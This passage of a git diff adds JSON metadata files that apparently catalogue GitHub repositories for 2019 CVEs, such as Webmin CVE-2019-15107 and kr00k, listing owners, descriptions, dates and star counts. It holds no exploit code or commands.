"https:\/\/avatars.githubusercontent.com\/u\/56482137?v=4", + "html_url": "https:\/\/github.com\/whokilleddb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/whokilleddb\/CVE-2019-15107", + "description": "CVE-2019-15107 Webmin Exploit in C", + "fork": false, + "created_at": "2021-07-02T19:51:18Z", + "updated_at": "2021-10-17T18:05:32Z", + "pushed_at": "2021-10-02T16:25:32Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "exploit", + "poc", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 404793285, + "name": "CVE-2019-15107", + "full_name": "darrenmartyn\/CVE-2019-15107", + "owner": { + "login": "darrenmartyn", + "id": 49643587, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49643587?v=4", + "html_url": "https:\/\/github.com\/darrenmartyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/darrenmartyn\/CVE-2019-15107", + "description": "Something I wrote for CVE-2019-15107, a Webmin backdoor", + "fork": false, + "created_at": "2021-09-09T16:26:40Z", + "updated_at": "2021-09-09T16:27:24Z", + "pushed_at": "2021-09-09T16:27:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 413927232, + "name": "CVE-2019-15107-Exploit", + "full_name": "hacknotes\/CVE-2019-15107-Exploit", + "owner": { + "login": "hacknotes", + "id": 91343759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91343759?v=4", + "html_url": "https:\/\/github.com\/hacknotes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hacknotes\/CVE-2019-15107-Exploit", + "description": "Exploit para CVE-2019-15107 (Webmin 1.890-1.920) sin credenciales RCE escrito en PYTHON.", + "fork": false, + "created_at": "2021-10-05T18:02:13Z", + "updated_at": "2021-10-21T02:06:16Z", + "pushed_at": "2021-10-16T13:59:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415535559, + "name": "CVE-2019-15107_detection", + "full_name": "CyberTuz\/CVE-2019-15107_detection", + "owner": { + "login": "CyberTuz", + "id": 50274376, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50274376?v=4", + "html_url": "https:\/\/github.com\/CyberTuz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CyberTuz\/CVE-2019-15107_detection", + "description": null, + "fork": false, + "created_at": "2021-10-10T09:05:55Z", + "updated_at": "2021-10-10T09:08:19Z", + "pushed_at": "2021-10-10T09:08:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 462019807, + "name": "webmin_1.920", + "full_name": "hadrian3689\/webmin_1.920", + "owner": { + "login": "hadrian3689", + "id": 71423134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hadrian3689\/webmin_1.920", + "description": "CVE-2019-15107 Webmin 1.920 RCE", + "fork": false, + "created_at": "2022-02-21T20:23:53Z", + "updated_at": "2023-01-03T01:53:23Z", + "pushed_at": "2022-09-20T15:38:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 482821096, + "name": "CVE-2019-15107", + "full_name": "f0rkr\/CVE-2019-15107", + "owner": { + "login": "f0rkr", + "id": 39636110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39636110?v=4", + "html_url": "https:\/\/github.com\/f0rkr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/f0rkr\/CVE-2019-15107", + "description": "CVE-2019-15107", + "fork": false, + "created_at": "2022-04-18T11:25:42Z", + "updated_at": "2022-04-18T11:25:42Z", + "pushed_at": "2022-04-18T13:08:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 504519500, + "name": "CVE-2019-15107_webminRCE", + "full_name": "psw01\/CVE-2019-15107_webminRCE", + "owner": { + "login": "psw01", + "id": 57420099, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57420099?v=4", + "html_url": "https:\/\/github.com\/psw01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/psw01\/CVE-2019-15107_webminRCE", + "description": "unauthorized RcE exploit for webnin < 1.920", + "fork": false, + "created_at": "2022-06-17T12:04:38Z", + "updated_at": "2022-06-17T12:24:21Z", + "pushed_at": "2022-06-17T12:34:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517960755, + "name": "MiniExploit", + "full_name": "TheAlpha19\/MiniExploit", + "owner": { + "login": "TheAlpha19", + "id": 37271374, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37271374?v=4", + "html_url": "https:\/\/github.com\/TheAlpha19", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheAlpha19\/MiniExploit", + "description": "WebMin Versions <= 1.920 [CVE-2019-15107] RCE PoC", + "fork": false, + "created_at": "2022-07-26T07:38:03Z", + "updated_at": "2024-11-06T23:17:15Z", + "pushed_at": "2022-07-28T13:57:13Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 611785897, + "name": "CVE-2019-15107", + "full_name": "wenruoya\/CVE-2019-15107", + "owner": { + "login": "wenruoya", + "id": 44966823, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44966823?v=4", + "html_url": "https:\/\/github.com\/wenruoya", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wenruoya\/CVE-2019-15107", + "description": "CVE-2019-15107 图形化测试程序", + "fork": false, + "created_at": "2023-03-09T14:43:29Z", + "updated_at": "2023-05-25T13:08:40Z", + "pushed_at": "2023-03-10T02:48:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 621992571, + "name": "CVE-2019-15107", + "full_name": "g1vi\/CVE-2019-15107", + "owner": { + "login": "g1vi", + "id": 120142960, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/120142960?v=4", + "html_url": "https:\/\/github.com\/g1vi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g1vi\/CVE-2019-15107", + "description": "webmin <=1.920 - RCE via command injection vulnerability", + "fork": false, + "created_at": "2023-03-31T20:56:39Z", + "updated_at": "2023-03-31T21:24:29Z", + "pushed_at": "2023-03-31T21:19:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 637572736, + "name": "CVE-2019-15107-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2019-15107-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2019-15107-EXPLOIT", + "description": "A PoC exploit for CVE-2019-15107 - Webmin Remote Code Execution", + "fork": false, + "created_at": "2023-05-08T00:25:37Z", + "updated_at": "2024-10-19T09:42:20Z", + "pushed_at": "2024-01-09T19:08:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "command-injection", + "critical", + "cve-2019-15107", + "webmin" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 640832616, + "name": "detect-CVE-2019-15107-by-pyshark", + "full_name": "gozn\/detect-CVE-2019-15107-by-pyshark", + "owner": { + "login": "gozn", + "id": 24872162, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24872162?v=4", + "html_url": "https:\/\/github.com\/gozn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gozn\/detect-CVE-2019-15107-by-pyshark", + "description": "school project", + "fork": false, + "created_at": "2023-05-15T08:13:46Z", + "updated_at": "2024-06-11T02:40:07Z", + "pushed_at": "2023-10-26T14:04:31Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 680397380, + "name": "CVE-2019-15107", + "full_name": "h4ck0rman\/CVE-2019-15107", + "owner": { + "login": "h4ck0rman", + "id": 105838328, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/105838328?v=4", + "html_url": "https:\/\/github.com\/h4ck0rman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h4ck0rman\/CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2023-08-19T05:41:39Z", + "updated_at": "2023-08-25T05:36:27Z", + "pushed_at": "2023-08-25T05:36:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716569237, + "name": "CVE-2019-15107", + "full_name": "olingo99\/CVE-2019-15107", + "owner": { + "login": "olingo99", + "id": 33429185, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33429185?v=4", + "html_url": "https:\/\/github.com\/olingo99", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/olingo99\/CVE-2019-15107", + "description": null, + "fork": false, + "created_at": "2023-11-09T12:14:11Z", + "updated_at": "2023-11-09T12:14:47Z", + "pushed_at": "2023-11-09T12:16:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 716571164, + "name": "Webmin-CVE-2019-15107", + "full_name": "aamfrk\/Webmin-CVE-2019-15107", + "owner": { + "login": "aamfrk", + "id": 112669603, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112669603?v=4", + "html_url": "https:\/\/github.com\/aamfrk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aamfrk\/Webmin-CVE-2019-15107", + "description": "Exploit for Webmin servers, versions 1.890 through 1.920", + "fork": false, + "created_at": "2023-11-09T12:19:09Z", + "updated_at": "2024-04-28T21:04:26Z", + "pushed_at": "2024-04-28T21:04:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-15107", + "exploit", + "python", + "rce", + "webmin" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 730844328, + "name": "Webmin-CVE-2019-15107", + "full_name": "0x4r2\/Webmin-CVE-2019-15107", + "owner": { + "login": "0x4r2", + "id": 6622069, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6622069?v=4", + "html_url": "https:\/\/github.com\/0x4r2", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x4r2\/Webmin-CVE-2019-15107", + "description": "RCE for Webmin CVE-2019-15107", + "fork": false, + "created_at": "2023-12-12T19:53:50Z", + "updated_at": "2023-12-12T19:55:17Z", + "pushed_at": "2023-12-12T19:59:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 849386236, + "name": "CVE-2019-15107", + "full_name": "NasrallahBaadi\/CVE-2019-15107", + "owner": { + "login": "NasrallahBaadi", + "id": 33826467, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33826467?v=4", + "html_url": "https:\/\/github.com\/NasrallahBaadi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/NasrallahBaadi\/CVE-2019-15107", + "description": "CVE-2019-15107 Webmin unauthenticated RCE", + "fork": false, + "created_at": "2024-08-29T13:58:36Z", + "updated_at": "2024-08-29T13:59:52Z", + "pushed_at": "2024-08-29T13:59:49Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 863082077, + "name": "CVE-2019-15107", + "full_name": "grayorwhite\/CVE-2019-15107", + "owner": { + "login": "grayorwhite", + "id": 87687276, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87687276?v=4", + "html_url": "https:\/\/github.com\/grayorwhite", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/grayorwhite\/CVE-2019-15107", + "description": "CVE-2019-15107 webmin 취약점에 대해서 직접 서버를 구축하고 공격 결과를 남긴 정보입니다.", + "fork": false, + "created_at": "2024-09-25T17:22:52Z", + "updated_at": "2024-09-25T17:23:28Z", + "pushed_at": "2024-09-25T17:23:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15120.json b/2019/CVE-2019-15120.json new file mode 100644 index 0000000000..a9a67e6cf5 --- /dev/null +++ b/2019/CVE-2019-15120.json @@ -0,0 +1,33 @@ +[ + { + "id": 210601259, + "name": "CVE-2019-15120", + "full_name": "h3llraiser\/CVE-2019-15120", + "owner": { + "login": "h3llraiser", + "id": 52741391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52741391?v=4", + "html_url": "https:\/\/github.com\/h3llraiser", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h3llraiser\/CVE-2019-15120", + "description": "Exploit for XSS via BBCode on Kunena extension before 5.1.14 for Joomla!", + "fork": false, + "created_at": "2019-09-24T12:47:09Z", + "updated_at": "2024-08-12T19:53:18Z", + "pushed_at": "2019-11-16T17:11:28Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15126.json b/2019/CVE-2019-15126.json new file mode 100644 index 0000000000..1ea2f198b7 --- /dev/null +++ b/2019/CVE-2019-15126.json @@ -0,0 +1,95 @@ +[ + { + "id": 246015101, + "name": "kr00k", + "full_name": "0x13enny\/kr00k", + "owner": { + "login": "0x13enny", + "id": 43164540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43164540?v=4", + "html_url": "https:\/\/github.com\/0x13enny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x13enny\/kr00k", + "description": "PoC of CVE-2019-15126 kr00k vulnerability", + "fork": false, + "created_at": "2020-03-09T11:15:08Z", + "updated_at": "2024-08-12T19:58:31Z", + "pushed_at": "2020-03-19T06:55:28Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 12, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 247095664, + "name": "r00kie-kr00kie", + "full_name": "hexway\/r00kie-kr00kie", + "owner": { + "login": "hexway", + "id": 52449816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52449816?v=4", + "html_url": "https:\/\/github.com\/hexway", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hexway\/r00kie-kr00kie", + "description": "PoC exploit for the CVE-2019-15126 kr00k vulnerability", + "fork": false, + "created_at": "2020-03-13T14:53:54Z", + "updated_at": "2024-08-14T15:51:03Z", + "pushed_at": "2020-03-22T19:46:04Z", + "stargazers_count": 217, + "watchers_count": 217, + "has_discussions": false, + "forks_count": 63, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 63, + "watchers": 217, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 248283931, + "name": "kr00ker", + "full_name": "akabe1\/kr00ker", + "owner": { + "login": "akabe1", + "id": 46047144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46047144?v=4", + "html_url": "https:\/\/github.com\/akabe1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/akabe1\/kr00ker", + "description": "An experimental script PoC for Kr00k vulnerability (CVE-2019-15126)", + "fork": false, + "created_at": "2020-03-18T16:25:28Z", + "updated_at": "2024-11-14T18:56:13Z", + "pushed_at": "2022-01-19T20:41:35Z", + "stargazers_count": 62, + "watchers_count": 62, + "has_discussions": false, + "forks_count": 10, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 10, + "watchers": 62, + "score": 0, + "subscribers_count": 8 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15166.json b/2019/CVE-2019-15166.json new file mode 100644 index 0000000000..b949f13fc9 --- /dev/null +++ b/2019/CVE-2019-15166.json @@ -0,0 +1,33 @@ +[ + { + "id": 484342272, + "name": "external_tcpdump_AOSP10_r33_CVE-2019-15166", + "full_name": "Satheesh575555\/external_tcpdump_AOSP10_r33_CVE-2019-15166", + "owner": { + "login": "Satheesh575555", + "id": 102573923, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102573923?v=4", + "html_url": "https:\/\/github.com\/Satheesh575555", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Satheesh575555\/external_tcpdump_AOSP10_r33_CVE-2019-15166", + "description": null, + "fork": false, + "created_at": "2022-04-22T07:43:37Z", + "updated_at": "2023-04-10T01:19:55Z", + "pushed_at": "2022-04-22T07:45:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15224.json b/2019/CVE-2019-15224.json new file mode 100644 index 0000000000..2433c91b42 --- /dev/null +++ b/2019/CVE-2019-15224.json @@ -0,0 +1,33 @@ +[ + { + "id": 204066882, + "name": "inspec_cve_2019_15224", + "full_name": "chef-cft\/inspec_cve_2019_15224", + "owner": { + "login": "chef-cft", + "id": 13543320, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13543320?v=4", + "html_url": "https:\/\/github.com\/chef-cft", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chef-cft\/inspec_cve_2019_15224", + "description": "Example InSpec profile to detect presence of a malicious rest-client gem (CVE-2019-15224)", + "fork": false, + "created_at": "2019-08-23T20:38:44Z", + "updated_at": "2024-08-12T19:52:18Z", + "pushed_at": "2021-08-24T12:54:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 9 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15231.json b/2019/CVE-2019-15231.json new file mode 100644 index 0000000000..165f9fadfd --- /dev/null +++ b/2019/CVE-2019-15231.json @@ -0,0 +1,33 @@ +[ + { + "id": 428316430, + "name": "THM-Source-CVE-2019-15231", + "full_name": "wizardy0ga\/THM-Source-CVE-2019-15231", + "owner": { + "login": "wizardy0ga", + "id": 90923369, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90923369?v=4", + "html_url": "https:\/\/github.com\/wizardy0ga", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wizardy0ga\/THM-Source-CVE-2019-15231", + "description": "A write up on the TryHackMe room Source & a python script to exploit the vulnerability", + "fork": false, + "created_at": "2021-11-15T15:23:05Z", + "updated_at": "2021-11-15T15:32:20Z", + "pushed_at": "2021-11-15T15:32:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15233.json b/2019/CVE-2019-15233.json new file mode 100644 index 0000000000..72b1b1bb21 --- /dev/null +++ b/2019/CVE-2019-15233.json @@ -0,0 +1,40 @@ +[ + { + "id": 203378087, + "name": "CVE-2019-15233", + "full_name": "l0nax\/CVE-2019-15233", + "owner": { + "login": "l0nax", + "id": 29659953, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29659953?v=4", + "html_url": "https:\/\/github.com\/l0nax", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l0nax\/CVE-2019-15233", + "description": "(FAB-2019-00157) Vulnerability discoverd by me CVE-2019-15233", + "fork": false, + "created_at": "2019-08-20T13:05:56Z", + "updated_at": "2024-08-12T19:52:11Z", + "pushed_at": "2019-10-04T09:10:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-15233", + "exploit", + "poc", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15477.json b/2019/CVE-2019-15477.json new file mode 100644 index 0000000000..7f5a9aaec1 --- /dev/null +++ b/2019/CVE-2019-15477.json @@ -0,0 +1,33 @@ +[ + { + "id": 808374483, + "name": "jooby", + "full_name": "epicosy\/jooby", + "owner": { + "login": "epicosy", + "id": 30272775, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30272775?v=4", + "html_url": "https:\/\/github.com\/epicosy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/epicosy\/jooby", + "description": "jooby with CVE-2019-15477", + "fork": false, + "created_at": "2024-05-31T00:09:01Z", + "updated_at": "2024-05-31T00:11:31Z", + "pushed_at": "2024-05-31T00:11:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15511.json b/2019/CVE-2019-15511.json new file mode 100644 index 0000000000..0402966bca --- /dev/null +++ b/2019/CVE-2019-15511.json @@ -0,0 +1,33 @@ +[ + { + "id": 203594549, + "name": "CVE-2019-15511", + "full_name": "adenkiewicz\/CVE-2019-15511", + "owner": { + "login": "adenkiewicz", + "id": 1060275, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1060275?v=4", + "html_url": "https:\/\/github.com\/adenkiewicz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/adenkiewicz\/CVE-2019-15511", + "description": "GOG Galaxy Exploit for CVE-2019-15511", + "fork": false, + "created_at": "2019-08-21T13:52:13Z", + "updated_at": "2024-08-12T19:52:13Z", + "pushed_at": "2019-11-15T14:50:47Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15514.json b/2019/CVE-2019-15514.json new file mode 100644 index 0000000000..748c59b286 --- /dev/null +++ b/2019/CVE-2019-15514.json @@ -0,0 +1,33 @@ +[ + { + "id": 440627700, + "name": "CVE-2019-15514", + "full_name": "bibi1959\/CVE-2019-15514", + "owner": { + "login": "bibi1959", + "id": 16669244, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16669244?v=4", + "html_url": "https:\/\/github.com\/bibi1959", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibi1959\/CVE-2019-15514", + "description": "telegram bug that discloses user's hidden phone number (still unpatched) (exploit included) ", + "fork": false, + "created_at": "2021-12-21T19:23:09Z", + "updated_at": "2024-08-14T19:15:57Z", + "pushed_at": "2021-12-19T18:18:36Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 17, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15588.json b/2019/CVE-2019-15588.json new file mode 100644 index 0000000000..4bc1aeec97 --- /dev/null +++ b/2019/CVE-2019-15588.json @@ -0,0 +1,37 @@ +[ + { + "id": 322771832, + "name": "CVE-2019-15588", + "full_name": "EXP-Docs\/CVE-2019-15588", + "owner": { + "login": "EXP-Docs", + "id": 132466462, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/132466462?v=4", + "html_url": "https:\/\/github.com\/EXP-Docs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EXP-Docs\/CVE-2019-15588", + "description": "CVE-2019-15588 靶场: RCE 命令注入漏洞", + "fork": false, + "created_at": "2020-12-19T05:11:03Z", + "updated_at": "2023-05-03T15:55:49Z", + "pushed_at": "2023-01-24T10:35:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2019-15588", + "learning" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15605.json b/2019/CVE-2019-15605.json new file mode 100644 index 0000000000..db8dd3c4d0 --- /dev/null +++ b/2019/CVE-2019-15605.json @@ -0,0 +1,33 @@ +[ + { + "id": 261315627, + "name": "node-poc-http-smuggling", + "full_name": "jlcarruda\/node-poc-http-smuggling", + "owner": { + "login": "jlcarruda", + "id": 5459797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5459797?v=4", + "html_url": "https:\/\/github.com\/jlcarruda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jlcarruda\/node-poc-http-smuggling", + "description": "PoC of Backend HTTP Socket Poisoning, via HTTP Smuggling, presented in CVE-2019-15605 ", + "fork": false, + "created_at": "2020-05-04T23:11:28Z", + "updated_at": "2021-01-06T18:07:08Z", + "pushed_at": "2022-12-12T16:38:29Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-15642.json b/2019/CVE-2019-15642.json new file mode 100644 index 0000000000..91ab1ee887 --- /dev/null +++ b/2019/CVE-2019-15642.json @@ -0,0 +1,33 @@ +[ + { + "id": 205655418, + "name": "CVE-2019-15642", + "full_name": "jas502n\/CVE-2019-15642", + "owner": { + "login": "jas502n", + "id": 16593068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16593068?v=4", + "html_url": "https:\/\/github.com\/jas502n", + "user_view_type": "public" + }, + 